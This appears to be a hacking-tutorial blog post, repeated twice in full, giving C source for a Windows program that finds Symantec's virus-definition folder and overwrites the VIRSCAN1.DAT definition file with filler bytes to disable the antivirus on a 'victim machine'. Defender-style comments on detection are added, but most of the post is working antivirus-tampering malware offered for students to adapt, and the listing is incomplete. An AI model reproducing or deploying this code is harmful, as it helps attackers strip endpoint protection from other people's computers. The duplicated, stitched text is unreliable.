Filename | A simple program in C that will kill antivirus program |
Author | Unknown |
Date and Time | 12/14/2015 |
Label | Basic Tutorials |
Sadik Shaikh | Extreme Hacking
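Hello friends, recently in my CEH (Certified Ethical Hacker) class one of my students told me that he was having difficulty bypassing the antivirus on the victim machine.
So I thought, why not create a program that will kill the antivirus :)
The logic came to mind and the code executed successfully. This code is for all my dear students; go through the logic and create a new one for yourself. If you have any difficulty understanding the logical flow, you can write to me at instructor@arizonainfotech.com.
Note that the listing is tied to one product's on-disk layout (the `Symantec Shared\virusdefs` folder under Common Files) and needs write access to the definition files, so it exits without effect when that folder is absent or the file cannot be opened for writing. A write attempt on a definition file by a process that is not the vendor's updater is the event endpoint monitoring should flag.
Here is the code: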
#include <windows.h>
/*
 * Purpose (as written): locate the Symantec shared virus-definition folder,
 * read the name of the current definition set from definfo.dat, and overwrite
 * VIRSCAN1.DAT in that set with 0x90 bytes from offset 32 to the end of file.
 * Returns 1 at each checked failure and 0 after the final CloseHandle.
 *
 * Defender's reading of the observable behaviour:
 *  - read of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
 *    (very common on its own, low signal);
 *  - SetFileAttributes on definfo.dat and VIRSCAN1.DAT, replacing whatever
 *    attributes were set with FILE_ATTRIBUTE_ARCHIVE only;
 *  - a GENERIC_WRITE open of a definition file followed by one large write.
 * The last two, coming from a process that is not the product's own updater,
 * are the events worth alerting on; file-integrity monitoring of the
 * definitions folder and the product's tamper protection are the matching
 * controls.
 * NOTE(review): writing under Common Files normally needs administrative
 * rights under default ACLs -- confirm on the target build.
 *
 * The closing brace of main() is missing from this listing.
 */
int main()
{
/* Declared HWND, but only ever holds the GlobalAlloc result used as a fill buffer. */
HWND Lpbuff;
/* Declared HKEY; reused further down to hold the CreateFile handle. */
HKEY handle;
DWORD temp,size;
/* buff: definitions folder path, then definfo.dat path; fName: target file path;
   dirName: name of the current definition set read from definfo.dat. */
char buff[255],fName[255],dirName[255];
/* Open the CurrentVersion key read-only to find the Common Files directory. */
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
/* &temp receives the value type and is then overwritten by the return code. */
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
/* The registry key is not closed on this early return. */
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
/* Build "<CommonFilesDir>\Symantec Shared\virusdefs\" with unbounded strcat/strcpy;
   no length check is made against the 255-byte buffers. */
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
/* Replaces the file's attributes with ARCHIVE only; the result is not checked. */
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
/* Read CurDefs from the [DefDates] section of definfo.dat; default is "". */
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
/* An empty result (file or key missing) ends the program without touching anything else. */
if(!strcmp(dirName,""))
return 1;
/* Target path: "<virusdefs>\<CurDefs>\VIRSCAN1.DAT". */
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
/* Open the existing definition file for writing; other processes may still read it
   (FILE_SHARE_READ). This call fails if the file is absent or write access is denied. */
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
/* Low 32 bits of the file size minus 32; the high part written to temp is unused,
   and GetFileSize failure is not checked. */
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
/* Fill buffer with the constant byte 0x90. */
FillMemory(Lpbuff,size,0x90);
/* Seek to offset 32, so the first 32 bytes of the file are left as they were. */
SetFilePointer(handle,32,0,FILE_BEGIN);
/* Single write of the fill buffer; the result is not checked and the buffer is never freed. */
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
Sadik Shaikh | Extreme Hacking
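Hello friends, recently in my CEH (Certified Ethical Hacker) class one of my students told me that he was having difficulty bypassing the antivirus on the victim machine.
So I thought, why not create a program that will kill the antivirus :)
The logic came to mind and the code executed successfully. This code is for all my dear students; go through the logic and create a new one for yourself. If you have any difficulty understanding the logical flow, you can write to me at instructor@arizonainfotech.com.
Note that the listing is tied to one product's on-disk layout (the `Symantec Shared\virusdefs` folder under Common Files) and needs write access to the definition files, so it exits without effect when that folder is absent or the file cannot be opened for writing. A write attempt on a definition file by a process that is not the vendor's updater is the event endpoint monitoring should flag.
Here is the code: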
#include <windows.h>
/*
 * Purpose (as written): locate the Symantec shared virus-definition folder,
 * read the name of the current definition set from definfo.dat, and overwrite
 * VIRSCAN1.DAT in that set with 0x90 bytes from offset 32 to the end of file.
 * Returns 1 at each checked failure and 0 after the final CloseHandle.
 *
 * Defender's reading of the observable behaviour:
 *  - read of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
 *    (very common on its own, low signal);
 *  - SetFileAttributes on definfo.dat and VIRSCAN1.DAT, replacing whatever
 *    attributes were set with FILE_ATTRIBUTE_ARCHIVE only;
 *  - a GENERIC_WRITE open of a definition file followed by one large write.
 * The last two, coming from a process that is not the product's own updater,
 * are the events worth alerting on; file-integrity monitoring of the
 * definitions folder and the product's tamper protection are the matching
 * controls.
 * NOTE(review): writing under Common Files normally needs administrative
 * rights under default ACLs -- confirm on the target build.
 *
 * The closing brace of main() is missing from this listing.
 */
int main()
{
/* Declared HWND, but only ever holds the GlobalAlloc result used as a fill buffer. */
HWND Lpbuff;
/* Declared HKEY; reused further down to hold the CreateFile handle. */
HKEY handle;
DWORD temp,size;
/* buff: definitions folder path, then definfo.dat path; fName: target file path;
   dirName: name of the current definition set read from definfo.dat. */
char buff[255],fName[255],dirName[255];
/* Open the CurrentVersion key read-only to find the Common Files directory. */
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
/* &temp receives the value type and is then overwritten by the return code. */
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
/* The registry key is not closed on this early return. */
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
/* Build "<CommonFilesDir>\Symantec Shared\virusdefs\" with unbounded strcat/strcpy;
   no length check is made against the 255-byte buffers. */
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
/* Replaces the file's attributes with ARCHIVE only; the result is not checked. */
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
/* Read CurDefs from the [DefDates] section of definfo.dat; default is "". */
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
/* An empty result (file or key missing) ends the program without touching anything else. */
if(!strcmp(dirName,""))
return 1;
/* Target path: "<virusdefs>\<CurDefs>\VIRSCAN1.DAT". */
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
/* Open the existing definition file for writing; other processes may still read it
   (FILE_SHARE_READ). This call fails if the file is absent or write access is denied. */
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
/* Low 32 bits of the file size minus 32; the high part written to temp is unused,
   and GetFileSize failure is not checked. */
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
/* Fill buffer with the constant byte 0x90. */
FillMemory(Lpbuff,size,0x90);
/* Seek to offset 32, so the first 32 bytes of the file are left as they were. */
SetFilePointer(handle,32,0,FILE_BEGIN);
/* Single write of the fill buffer; the result is not checked and the buffer is never freed. */
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;